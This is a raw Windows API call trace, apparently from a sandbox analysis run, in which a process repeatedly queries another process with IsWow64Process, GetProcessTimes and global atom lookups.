	[0134.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.253] CloseHandle (hObject=0x2dc) returned 1
	[0134.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.254] CloseHandle (hObject=0x2dc) returned 1
	[0134.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.254] CloseHandle (hObject=0x2dc) returned 1
	[0134.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.254] CloseHandle (hObject=0x2dc) returned 1
	[0134.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.254] CloseHandle (hObject=0x2dc) returned 1
	[0134.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.255] CloseHandle (hObject=0x2dc) returned 1
	[0134.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.255] CloseHandle (hObject=0x2dc) returned 1
	[0134.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.255] CloseHandle (hObject=0x2dc) returned 1
	[0134.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.255] CloseHandle (hObject=0x2dc) returned 1
	[0134.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.256] CloseHandle (hObject=0x2dc) returned 1
	[0134.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.256] CloseHandle (hObject=0x2dc) returned 1
	[0134.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.256] CloseHandle (hObject=0x2dc) returned 1
	[0134.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.256] CloseHandle (hObject=0x2dc) returned 1
	[0134.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.256] CloseHandle (hObject=0x2dc) returned 1
	[0134.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.257] CloseHandle (hObject=0x2dc) returned 1
	[0134.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.257] CloseHandle (hObject=0x2dc) returned 1
	[0134.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.257] CloseHandle (hObject=0x2dc) returned 1
	[0134.258] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.258] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.258] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.258] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.259] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.259] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.259] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.259] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.259] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.259] CloseHandle (hObject=0x2dc) returned 1
	[0134.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.259] CloseHandle (hObject=0x2dc) returned 1
	[0134.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.260] CloseHandle (hObject=0x2dc) returned 1
	[0134.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.260] CloseHandle (hObject=0x2dc) returned 1
	[0134.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.260] CloseHandle (hObject=0x2dc) returned 1
	[0134.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.260] CloseHandle (hObject=0x2dc) returned 1
	[0134.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.293] CloseHandle (hObject=0x2dc) returned 1
	[0134.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.294] CloseHandle (hObject=0x2dc) returned 1
	[0134.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.294] CloseHandle (hObject=0x2dc) returned 1
	[0134.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.294] CloseHandle (hObject=0x2dc) returned 1
	[0134.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.294] CloseHandle (hObject=0x2dc) returned 1
	[0134.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.295] CloseHandle (hObject=0x2dc) returned 1
	[0134.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.295] CloseHandle (hObject=0x2dc) returned 1
	[0134.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.295] CloseHandle (hObject=0x2dc) returned 1
	[0134.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.295] CloseHandle (hObject=0x2dc) returned 1
	[0134.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.296] CloseHandle (hObject=0x2dc) returned 1
	[0134.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.296] CloseHandle (hObject=0x2dc) returned 1
	[0134.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.296] CloseHandle (hObject=0x2dc) returned 1
	[0134.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.296] CloseHandle (hObject=0x2dc) returned 1
	[0134.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.297] CloseHandle (hObject=0x2dc) returned 1
	[0134.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.297] CloseHandle (hObject=0x2dc) returned 1
	[0134.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.297] CloseHandle (hObject=0x2dc) returned 1
	[0134.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.297] CloseHandle (hObject=0x2dc) returned 1
	[0134.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.298] CloseHandle (hObject=0x2dc) returned 1
	[0134.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.298] CloseHandle (hObject=0x2dc) returned 1
	[0134.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.298] CloseHandle (hObject=0x2dc) returned 1
	[0134.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.298] CloseHandle (hObject=0x2dc) returned 1
	[0134.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.298] CloseHandle (hObject=0x2dc) returned 1
	[0134.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.299] CloseHandle (hObject=0x2dc) returned 1
	[0134.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.299] CloseHandle (hObject=0x2dc) returned 1
	[0134.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.299] CloseHandle (hObject=0x2dc) returned 1
	[0134.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.299] CloseHandle (hObject=0x2dc) returned 1
	[0134.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.300] CloseHandle (hObject=0x2dc) returned 1
	[0134.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.300] CloseHandle (hObject=0x2dc) returned 1
	[0134.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.300] CloseHandle (hObject=0x2dc) returned 1
	[0134.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.300] CloseHandle (hObject=0x2dc) returned 1
	[0134.301] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.301] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.301] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.301] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.302] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.302] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.302] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.302] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.302] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.302] CloseHandle (hObject=0x2dc) returned 1
	[0134.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.302] CloseHandle (hObject=0x2dc) returned 1
	[0134.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.303] CloseHandle (hObject=0x2dc) returned 1
	[0134.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.303] CloseHandle (hObject=0x2dc) returned 1
	[0134.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.303] CloseHandle (hObject=0x2dc) returned 1
	[0134.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.303] CloseHandle (hObject=0x2dc) returned 1
	[0134.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.339] CloseHandle (hObject=0x2dc) returned 1
	[0134.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.339] CloseHandle (hObject=0x2dc) returned 1
	[0134.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.339] CloseHandle (hObject=0x2dc) returned 1
	[0134.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.340] CloseHandle (hObject=0x2dc) returned 1
	[0134.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.340] CloseHandle (hObject=0x2dc) returned 1
	[0134.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.340] CloseHandle (hObject=0x2dc) returned 1
	[0134.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.340] CloseHandle (hObject=0x2dc) returned 1
	[0134.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.341] CloseHandle (hObject=0x2dc) returned 1
	[0134.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.341] CloseHandle (hObject=0x2dc) returned 1
	[0134.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.341] CloseHandle (hObject=0x2dc) returned 1
	[0134.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.341] CloseHandle (hObject=0x2dc) returned 1
	[0134.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.342] CloseHandle (hObject=0x2dc) returned 1
	[0134.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.342] CloseHandle (hObject=0x2dc) returned 1
	[0134.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.342] CloseHandle (hObject=0x2dc) returned 1
	[0134.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.342] CloseHandle (hObject=0x2dc) returned 1
	[0134.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.343] CloseHandle (hObject=0x2dc) returned 1
	[0134.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.343] CloseHandle (hObject=0x2dc) returned 1
	[0134.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.343] CloseHandle (hObject=0x2dc) returned 1
	[0134.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.343] CloseHandle (hObject=0x2dc) returned 1
	[0134.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.343] CloseHandle (hObject=0x2dc) returned 1
	[0134.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.344] CloseHandle (hObject=0x2dc) returned 1
	[0134.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.344] CloseHandle (hObject=0x2dc) returned 1
	[0134.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.344] CloseHandle (hObject=0x2dc) returned 1
	[0134.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.344] CloseHandle (hObject=0x2dc) returned 1
	[0134.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.345] CloseHandle (hObject=0x2dc) returned 1
	[0134.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.345] CloseHandle (hObject=0x2dc) returned 1
	[0134.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.345] CloseHandle (hObject=0x2dc) returned 1
	[0134.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.345] CloseHandle (hObject=0x2dc) returned 1
	[0134.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.346] CloseHandle (hObject=0x2dc) returned 1
	[0134.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.346] CloseHandle (hObject=0x2dc) returned 1
	[0134.346] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.346] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.347] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.347] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.348] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.348] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.348] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.348] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.348] CloseHandle (hObject=0x2dc) returned 1
	[0134.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.348] CloseHandle (hObject=0x2dc) returned 1
	[0134.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.349] CloseHandle (hObject=0x2dc) returned 1
	[0134.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.349] CloseHandle (hObject=0x2dc) returned 1
	[0134.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.349] CloseHandle (hObject=0x2dc) returned 1
	[0134.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.349] CloseHandle (hObject=0x2dc) returned 1
	[0134.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.383] CloseHandle (hObject=0x2dc) returned 1
	[0134.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.383] CloseHandle (hObject=0x2dc) returned 1
	[0134.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.383] CloseHandle (hObject=0x2dc) returned 1
	[0134.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.384] CloseHandle (hObject=0x2dc) returned 1
	[0134.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.384] CloseHandle (hObject=0x2dc) returned 1
	[0134.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.384] CloseHandle (hObject=0x2dc) returned 1
	[0134.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.384] CloseHandle (hObject=0x2dc) returned 1
	[0134.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.385] CloseHandle (hObject=0x2dc) returned 1
	[0134.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.385] CloseHandle (hObject=0x2dc) returned 1
	[0134.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.385] CloseHandle (hObject=0x2dc) returned 1
	[0134.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.385] CloseHandle (hObject=0x2dc) returned 1
	[0134.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.386] CloseHandle (hObject=0x2dc) returned 1
	[0134.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.386] CloseHandle (hObject=0x2dc) returned 1
	[0134.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.386] CloseHandle (hObject=0x2dc) returned 1
	[0134.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.386] CloseHandle (hObject=0x2dc) returned 1
	[0134.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.387] CloseHandle (hObject=0x2dc) returned 1
	[0134.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.387] CloseHandle (hObject=0x2dc) returned 1
	[0134.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.387] CloseHandle (hObject=0x2dc) returned 1
	[0134.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.387] CloseHandle (hObject=0x2dc) returned 1
	[0134.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.387] CloseHandle (hObject=0x2dc) returned 1
	[0134.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.388] CloseHandle (hObject=0x2dc) returned 1
	[0134.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.388] CloseHandle (hObject=0x2dc) returned 1
	[0134.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.388] CloseHandle (hObject=0x2dc) returned 1
	[0134.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.388] CloseHandle (hObject=0x2dc) returned 1
	[0134.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.389] CloseHandle (hObject=0x2dc) returned 1
	[0134.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.389] CloseHandle (hObject=0x2dc) returned 1
	[0134.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.389] CloseHandle (hObject=0x2dc) returned 1
	[0134.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.390] CloseHandle (hObject=0x2dc) returned 1
	[0134.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.390] CloseHandle (hObject=0x2dc) returned 1
	[0134.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.390] CloseHandle (hObject=0x2dc) returned 1
	[0134.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.391] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.391] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.391] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.392] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.392] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.392] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.392] CloseHandle (hObject=0x2dc) returned 1
	[0134.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.392] CloseHandle (hObject=0x2dc) returned 1
	[0134.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.392] CloseHandle (hObject=0x2dc) returned 1
	[0134.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.392] CloseHandle (hObject=0x2dc) returned 1
	[0134.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.393] CloseHandle (hObject=0x2dc) returned 1
	[0134.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.393] CloseHandle (hObject=0x2dc) returned 1
	[0134.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.426] CloseHandle (hObject=0x2dc) returned 1
	[0134.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.426] CloseHandle (hObject=0x2dc) returned 1
	[0134.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.426] CloseHandle (hObject=0x2dc) returned 1
	[0134.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.427] CloseHandle (hObject=0x2dc) returned 1
	[0134.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.427] CloseHandle (hObject=0x2dc) returned 1
	[0134.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.427] CloseHandle (hObject=0x2dc) returned 1
	[0134.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.427] CloseHandle (hObject=0x2dc) returned 1
	[0134.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.428] CloseHandle (hObject=0x2dc) returned 1
